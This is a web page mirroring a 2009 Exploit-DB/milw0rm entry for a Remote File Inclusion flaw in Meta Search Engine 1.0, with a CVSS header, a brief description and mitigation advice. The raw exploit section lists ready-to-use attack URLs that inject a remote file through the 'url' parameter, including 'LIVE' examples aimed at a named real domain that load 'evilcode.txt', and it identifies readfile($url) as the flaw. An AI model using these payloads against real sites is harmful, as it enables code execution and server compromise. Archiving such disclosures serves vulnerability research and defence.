header-logo
Suggest Exploit
vendor:
Meta Search Engine
by:
Moudi
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Meta Search Engine
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Meta Search Engine 1.0 Remote File Inclusion

Meta Search Engine 1.0 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code. This code is then executed on the web server.

Mitigation:

To mitigate this vulnerability, the application should validate user input and filter out any malicious code. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================

	[»] Script:             [ Meta Search Engine 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ USD 12.99 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit RFI + LIVE : vulnerability ]===

[»] http://www.site.com/patch/?url=[RFI]&file=Search
[»] http://www.site.com/patch/index.php?url=[RFI]&file=Search

[»] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[»] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search


Author: Moudi

###########################################################################

note: readfile($url) is the issue, so fd

# milw0rm.com [2009-07-21]

Navigation

Suggest Exploit

Services By CQR